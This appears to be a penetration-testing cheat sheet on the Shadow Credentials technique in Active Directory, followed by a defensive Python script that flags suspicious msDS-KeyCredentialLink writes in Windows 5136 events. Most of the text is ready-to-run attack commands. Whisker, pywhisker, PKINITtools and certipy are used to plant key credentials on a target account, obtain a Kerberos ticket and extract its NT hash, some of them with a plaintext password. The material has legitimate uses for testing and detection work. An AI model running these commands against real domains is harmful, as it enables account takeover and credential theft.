"...if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user." (Elad Shamir, )

That makes GenericWrite on a user effectively equivalent to having DCSync rights over that user.
Check for the existence of the msDS-KeyCredentialLink attribute in the LDAP schema with:

```powershell
PS > Get-DomainObject -SearchBase CN=Schema,CN=Configuration,DC=megacorp,DC=local -Properties lDAPDisplayName -Where "lDAPDisplayName contains msDS-KeyCredentialLink"
```
Whisker

List all the values of the msDS-KeyCredentialLink attribute of a target object:

```
Cmd > .\Whisker.exe list /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local
```

Add a new value to the msDS-KeyCredentialLink attribute of a target object:

```
Cmd > .\Whisker.exe add /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /path:C:\Temp\cert.pfx /password:Passw0rd!
```

Remove a value from the msDS-KeyCredentialLink attribute of a target object:

```
Cmd > .\Whisker.exe remove /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /deviceid:00ff00ff-00ff-00ff-00ff-00ff00ff00ff
```

Clear all the values of the msDS-KeyCredentialLink attribute of a target object:

```
Cmd > .\Whisker.exe clear /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local
```
pywhisker

```
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action add -f sqltest_cert
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action clear
$ python3 gettgtpkinit.py megacorp.local/sqltest -cert-pfx sqltest_cert.pfx -pfx-pass <PFX_PASS> sqltest.ccache
$ KRB5CCNAME=sqltest.ccache python3 getnthash.py megacorp.local/sqltest -key <AES_KEY>
```
Certipy

```
$ certipy shadow auto -u svc_mssql@megacorp.local -k -no-pass -account sqltest -target DC01.megacorp.local -dc-ip 192.168.1.11 [-ns 192.168.1.11] [-dns-tcp]
```
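Detection side, as an added example that is not part of these notes: every tool above ends up as a write to msDS-KeyCredentialLink, which Windows records as Security event 5136 ("A directory service object was modified") once the Directory Service Changes audit subcategory and a Write Property SACL on the objects are in place. The script below triages constructed 5136-style events (key=value layout and sample values are assumptions for this example) and flags key-credential writes made by a principal other than the object itself, treating a self-write (normal device registration) as informational only.

```python
"""Triage Windows Security 5136 events for msDS-KeyCredentialLink writes."""
import re

# Constructed sample events for this example (not real log data). Field names
# follow the 5136 event schema; the one-line key=value layout is an assumption.
SAMPLE_EVENTS = [
    "EventID=5136 SubjectUserName=WS01$ ObjectDN=CN=WS01,CN=Computers,DC=megacorp,DC=local "
    "AttributeLDAPDisplayName=msDS-KeyCredentialLink OperationType=ValueAdded",
    "EventID=5136 SubjectUserName=svc_mssql ObjectDN=CN=sqltest,CN=Computers,DC=megacorp,DC=local "
    "AttributeLDAPDisplayName=msDS-KeyCredentialLink OperationType=ValueAdded",
    "EventID=5136 SubjectUserName=jdoe ObjectDN=CN=jdoe,CN=Users,DC=megacorp,DC=local "
    "AttributeLDAPDisplayName=description OperationType=ValueAdded",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")  # DN values contain commas but no spaces


def parse_event(line):
    """Split one key=value event line into a dict."""
    return dict(FIELD_RE.findall(line))


def object_name(dn):
    """First RDN value of the DN; approximates sAMAccountName (without '$')."""
    return dn.split(",")[0].split("=", 1)[1]


def classify(event):
    """Return 'info', 'alert' or None for a parsed event."""
    if event.get("EventID") != "5136":
        return None
    if event.get("AttributeLDAPDisplayName", "").lower() != "msds-keycredentiallink":
        return None
    subject = event["SubjectUserName"].rstrip("$").lower()
    target = object_name(event["ObjectDN"]).lower()
    # An object writing its own key credential is expected (e.g. device
    # registration); any other principal writing one deserves review, for
    # adds and deletes alike (clearing values can be an attempt to tidy up).
    return "info" if subject == target else "alert"


def triage(lines):
    """Return (verdict, subject, objectDN) for every key-credential write."""
    findings = []
    for line in lines:
        event = parse_event(line)
        verdict = classify(event)
        if verdict:
            findings.append((verdict, event["SubjectUserName"], event["ObjectDN"]))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(*finding)
```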